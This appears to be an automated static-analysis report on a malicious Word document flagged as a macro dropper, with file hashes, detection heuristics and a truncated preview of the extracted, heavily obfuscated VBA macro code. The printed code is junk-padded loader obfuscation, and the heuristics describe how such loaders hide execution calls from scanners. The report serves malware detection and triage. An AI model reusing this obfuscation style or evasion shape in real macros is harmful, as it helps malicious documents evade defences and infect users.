Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c9867fab4d5d4cb0…

MALICIOUS

Office (OLE)

211.5 KB Created: 2018-04-17 08:53:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: a16007284e6f6c827d4268e3d3b8d0bb SHA-1: c4c27f8d624ef8661a1c732ce120b9c8b266825b SHA-256: c9867fab4d5d4cb05a809c8adbd59b6627aa4eacf18e8bd913e47e6a07d4d8e6
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing heavily obfuscated VBA macros. The presence of 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' heuristics, along with the ClamAV detection 'Doc.Dropper.Emodldr-6755244-0', strongly indicates a dropper functionality. The VBA code appears to be designed to execute a second-stage payload, likely downloaded from a remote source, although the specific download URL is not directly extractable from the provided script excerpt.

Heuristics 7

  • ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 56199 bytes
SHA-256: b0a500ef7fd82119a6ecd87fd2c80c7746288c219b66d5a8853b66e42cedcc4e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub VgGiuC(xeNtdUf As String, EVxAwFL As Boolean)
    RmfdD = Right("nzE]nF$nIZwdh", 4)
    sszfLL = RTrim("&xOWtRZwJ^sqmoDFL !")
    hPzPfVZo = LTrim("fnE[IO?ZRMVmoAg[? @")
    hPzPfVZo = Left("eyaeS XUTeQ[", 5)
    gvssofb = UCase("JOSFCQ!-Ic%w")
    hPzPfVZo = "daacGo?rcBZ*BGtrh" + "YmRcb])QxSxOAB" + "TiWImZP%_unD"
    gvssofb = StrReverse("S#Po(UY)XzSx?ZMc_D")
    MdxWq = 1897 + 963 + 1840
    snNYO = Right("pm_g$tD!W?H.^eeO", 4)
    gvssofb = 714 - 1988 - 864
    RmfdD = "clU@NBYrIH$-xGSeuS#W" + "DvvMOOl$R#g" + "LUk_LXS#LtM"
    EbpGG = "aV)Ln(VhoITpM_?" + "!]no$-kyZO" + "RA*IaFnXVWT"
    gvssofb = Space(1)
    oudyluPl = StrReverse("*F B#xg_TiVZ)aOZZ")
    snNYO = LTrim("qJ(D-]f.Dhgggf#W_?@S")
    oudyluPl = "dwQrqdhy$&E KXx" + "kvdZ-.Tk[K[a" + "Kyjwwr IMm ^Ylc"
    For YdMwhG = 0 To 138
        EbpGG = Right("uDI[!]CUqT", 5)
        sszfLL = ")ucntHesTGaLO#_" + "r_fszFd^jN%lu_OJZ" + "K[r*^w&KxwD]gZHD"
        oudyluPl = RTrim("VB?hex@CpGx H.tM!]fO")
        EbpGG = 1178 + 1274 + 461
    Next YdMwhG

    RmfdD = UCase("T-mprxS n?tvt C#  a")
    oudyluPl = "ssJz)bumjxiZ" + "W%IlHk*fBXYuykoV?" + "!TtudzllbEB@C@GrF"
    For fRGgxg = 0 To 148
        RmfdD = Space(20)
        sszfLL = StrReverse("$eYYY?lfh]tk(%-@")
    Next fRGgxg

    sszfLL = Right("(CpIvr-IqE[", 4)
    EbpGG = UCase("pj.uTwZ@w@uCobM@i")
    sszfLL = UCase("besI%#@TP!.")
    oudyluPl = LTrim("xG!nG W)YJ_lp")
    sszfLL = LTrim("$Akujp]Ql@z b")
    While fIXSTj < 139
        RmfdD = "?J(KAv#$-bc@c #Kr" + "J?hhEYPTT?aTN uZ" + "CRJE&WIeBq%"
        MdxWq = Left("iNpw$)rzG]a-", 2)
        RmfdD = Space(16)
        sszfLL = UCase("nmiIcmRS?Snh#_Yl")
        sszfLL = 770 - 1064 - 1921
        oudyluPl = 1705 + 1586 + 636
        hPzPfVZo = StrReverse("[N]]JRPkl.W]r")
        gvssofb = "Tl(DFq?JQ%Z]sAZnW" + "ePLIZ?q!]NegbTys[" + "ZdQ?TXW-?%eR"
        sszfLL = UCase("kK^! B$SEJOaZGzS")
        fIXSTj = fIXSTj + 1
    Wend

    MdxWq = Left("N#eFCCRasKZ#_O.pt -m", 4)
    While aSkWTF < 178
        MdxWq = 839 - 1086 - 204
        MdxWq = UCase("FkLoaQYMB*[AFmL#p")
        RmfdD = "ABpgC&fHe@D@!]" + "iwK-KQU-(n%$TxU" + "R@&fsGdnczfSz]Ih%ITC"
        RmfdD = Left("LV&GC@mn#v% %!", 5)
        hPzPfVZo = Left("XkTGfMLJf?tw", 5)
        aSkWTF = aSkWTF + 2
    Wend

    snNYO = Right("?W^%HwGweA$LB^ii(", 4)
    hPzPfVZo = UCase("KsdbKhR qTWs@HWIKZ")
    snNYO = Left("*k B!K#Gzd.&?N^##U(u", 4)
    oudyluPl = RTrim("#XV))AgwM$vgrh?vNHOP")
    MdxWq = "uFCvWTU!_h(y?*VkouyF" + "^TQSCAKF.V_inNgJQ.w " + "K[tsrkT_WH YGTS"
    For AqGPWe = 0 To 326
        oudyluPl = LTrim("igEuVwss*IC#bm")
        oudyluPl = UCase("cDV-euv_Iy?I#N")
        snNYO = LTrim("XnVY_&%tkyMKR")
        gvssofb = Space(3)
        hPzPfVZo = 1021 + 743 + 648
        snNYO = " W&swP^Lxwk" + "woZCwMcCEgFBF#HmCC" + "m pDUDuloq^^l&"
        gvssofb = UCase("%[#!G sF_)Y)G_")
        EbpGG = LTrim("(%z)[(yf@b!@.pzhi")
        snNYO = "x@GGLPK%r(_sMI" + "*m*dtftDuEsHuLFkpRr" + "^Ge#F!wIKNs!SR"
    Next AqGPWe

    sszfLL = RTrim("sjGqf[ZuBPUpl-gAU!g")
    EbpGG = Right("r@QJS%zlhSfd", 2)
End Sub

Private Sub WbHIhU(eeeKjd As String, UdWsOi As Integer, zYoQRr As Boolean, PjBYcv As Double)
    EbpGG = 1773 - 1316 - 1069
    oudyluPl = LTrim("R$t%^ JFHuiyE[C$KV")
    While lpUCAn < 282
        hPzPfVZo = UCase("ew^?wc]$xvlB")
        EbpGG = Left("UjCDgx*Ded", 3)
        EbpGG = StrReverse("iiCi%W[!iQ")
        MdxWq = LTrim("qgUwjP.(W-M[")
        MdxWq = 701 - 329 - 606
        lpUCAn = lpUCAn + 3
    Wend

    While RhRoWa < 240
        sszfLL = "T(Za]!xYIts^[.W" + "j^sjyx@&V)-K " + "$HxTX$__ C&PDa!*hbK"
        sszfLL = LTrim("LEBND]bn#H_B")
        snNYO = StrReverse("K?&(SycCtXc%V#&t")
        gvssofb = Space(2)
     
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.